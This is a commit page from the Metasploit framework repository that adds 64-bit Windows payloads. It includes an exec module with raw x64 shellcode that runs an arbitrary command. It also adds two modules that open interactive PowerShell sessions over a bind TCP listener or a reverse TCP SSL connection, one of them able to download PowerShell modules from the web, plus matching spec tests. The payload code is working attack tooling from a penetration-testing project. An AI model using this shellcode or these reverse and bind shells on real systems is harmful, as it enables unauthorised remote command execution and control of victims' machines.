Lands #5446, support for 64-bit native powershell payloads

bug/bundler_fix
HD Moore 2015-06-07 14:16:19 -05:00
commit 1f11cd5470
No known key found for this signature in database
GPG Key ID: 7549FB3DB1DD1F32
4 changed files with 207 additions and 0 deletions

View File

@ -0,0 +1,67 @@
# -*- coding: binary -*-
module Msf
###
#
# Common command execution implementation for Windows.
#
###
module Payload::Windows::Exec_x64
include Msf::Payload::Windows
include Msf::Payload::Single
def initialize(info = {})
super(update_info(info,
'Name' => 'Windows x64 Execute Command',
'Description' => 'Execute an arbitrary command (Windows x64)',
'Author' => [ 'sf' ],
'License' => MSF_LICENSE,
'Platform' => 'win',
'Arch' => ARCH_X86_64,
'Payload' =>
{
'Offsets' =>
{
'EXITFUNC' => [ 229, 'V' ]
},
'Payload' =>
"\xFC\x48\x83\xE4\xF0\xE8\xC0\x00\x00\x00\x41\x51\x41\x50\x52\x51" +
"\x56\x48\x31\xD2\x65\x48\x8B\x52\x60\x48\x8B\x52\x18\x48\x8B\x52" +
"\x20\x48\x8B\x72\x50\x48\x0F\xB7\x4A\x4A\x4D\x31\xC9\x48\x31\xC0" +
"\xAC\x3C\x61\x7C\x02\x2C\x20\x41\xC1\xC9\x0D\x41\x01\xC1\xE2\xED" +
"\x52\x41\x51\x48\x8B\x52\x20\x8B\x42\x3C\x48\x01\xD0\x8B\x80\x88" +
"\x00\x00\x00\x48\x85\xC0\x74\x67\x48\x01\xD0\x50\x8B\x48\x18\x44" +
"\x8B\x40\x20\x49\x01\xD0\xE3\x56\x48\xFF\xC9\x41\x8B\x34\x88\x48" +
"\x01\xD6\x4D\x31\xC9\x48\x31\xC0\xAC\x41\xC1\xC9\x0D\x41\x01\xC1" +
"\x38\xE0\x75\xF1\x4C\x03\x4C\x24\x08\x45\x39\xD1\x75\xD8\x58\x44" +
"\x8B\x40\x24\x49\x01\xD0\x66\x41\x8B\x0C\x48\x44\x8B\x40\x1C\x49" +
"\x01\xD0\x41\x8B\x04\x88\x48\x01\xD0\x41\x58\x41\x58\x5E\x59\x5A" +
"\x41\x58\x41\x59\x41\x5A\x48\x83\xEC\x20\x41\x52\xFF\xE0\x58\x41" +
"\x59\x5A\x48\x8B\x12\xE9\x57\xFF\xFF\xFF\x5D\x48\xBA\x01\x00\x00" +
"\x00\x00\x00\x00\x00\x48\x8D\x8D\x01\x01\x00\x00\x41\xBA\x31\x8B" +
"\x6F\x87\xFF\xD5\xBB\xE0\x1D\x2A\x0A\x41\xBA\xA6\x95\xBD\x9D\xFF" +
"\xD5\x48\x83\xC4\x28\x3C\x06\x7C\x0A\x80\xFB\xE0\x75\x05\xBB\x47" +
"\x13\x72\x6F\x6A\x00\x59\x41\x89\xDA\xFF\xD5"
}
))
register_options(
[
OptString.new('CMD', [ true, "The command string to execute" ]),
], self.class )
end
def generate
return super + command_string + "\x00"
end
def command_string
return datastore['CMD'] || ''
end
end
end

View File

@ -0,0 +1,60 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'msf/core/payload/windows/exec_x64'
require 'msf/core/payload/windows/powershell'
require 'msf/base/sessions/powershell'
require 'msf/core/handler/bind_tcp'
###
#
# Extends the Exec payload to add a new user.
#
###
module Metasploit3
CachedSize = 1778
include Msf::Payload::Windows::Exec_x64
include Rex::Powershell::Command
include Msf::Payload::Windows::Powershell
def initialize(info = {})
super(update_info(info,
'Name' => 'Windows Interactive Powershell Session, Bind TCP',
'Description' => 'Listen for a connection and spawn an interactive powershell session',
'Author' =>
[
'Ben Turner', # benpturner
'Dave Hardy' # davehardy20
],
'References' =>
[
['URL', 'https://www.nettitude.co.uk/interactive-powershell-session-via-metasploit/']
],
'License' => MSF_LICENSE,
'Platform' => 'win',
'Arch' => ARCH_X86_64,
'Handler' => Msf::Handler::BindTcp,
'Session' => Msf::Sessions::PowerShell,
))
# Register command execution options
register_options(
[
OptString.new('LOAD_MODULES', [ false, "A list of powershell modules seperated by a comma to download over the web", nil ]),
], self.class)
# Hide the CMD option...this is kinda ugly
deregister_options('CMD')
end
#
# Override the exec command string
#
def command_string
generate_powershell_code("Bind")
end
end

View File

@ -0,0 +1,60 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'msf/core/payload/windows/exec_x64'
require 'msf/core/payload/windows/powershell'
require 'msf/base/sessions/powershell'
require 'msf/core/handler/reverse_tcp_ssl'
###
#
# Extends the Exec payload to add a new user.
#
###
module Metasploit3
CachedSize = 1786
include Msf::Payload::Windows::Exec_x64
include Msf::Payload::Windows::Powershell
include Rex::Powershell::Command
def initialize(info = {})
super(update_info(info,
'Name' => 'Windows Interactive Powershell Session, Reverse TCP',
'Description' => 'Listen for a connection and spawn an interactive powershell session',
'Author' =>
[
'Ben Turner', # benpturner
'Dave Hardy' # davehardy20
],
'References' =>
[
['URL', 'https://www.nettitude.co.uk/interactive-powershell-session-via-metasploit/']
],
'License' => MSF_LICENSE,
'Platform' => 'win',
'Arch' => ARCH_X86_64,
'Handler' => Msf::Handler::ReverseTcpSsl,
'Session' => Msf::Sessions::PowerShell,
))
# Register command execution options
register_options(
[
OptString.new('LOAD_MODULES', [ false, "A list of powershell modules seperated by a comma to download over the web", nil ]),
], self.class)
# Hide the CMD option...this is kinda ugly
deregister_options('CMD')
end
#
# Override the exec command string
#
def command_string
generate_powershell_code("Reverse")
end
end

View File

@ -3827,6 +3827,26 @@ describe 'modules/payloads', :content do
reference_name: 'windows/x64/meterpreter_reverse_tcp'
end
context 'windows/x64/powershell_bind_tcp' do
it_should_behave_like 'payload cached size is consistent',
ancestor_reference_names: [
'singles/windows/x64/powershell_bind_tcp'
],
dynamic_size: false,
modules_pathname: modules_pathname,
reference_name: 'windows/x64/powershell_bind_tcp'
end
context 'windows/x64/powershell_reverse_tcp' do
it_should_behave_like 'payload cached size is consistent',
ancestor_reference_names: [
'singles/windows/x64/powershell_reverse_tcp'
],
dynamic_size: false,
modules_pathname: modules_pathname,
reference_name: 'windows/x64/powershell_reverse_tcp'
end
context 'windows/x64/shell/bind_tcp' do
it_should_behave_like 'payload cached size is consistent',
ancestor_reference_names: [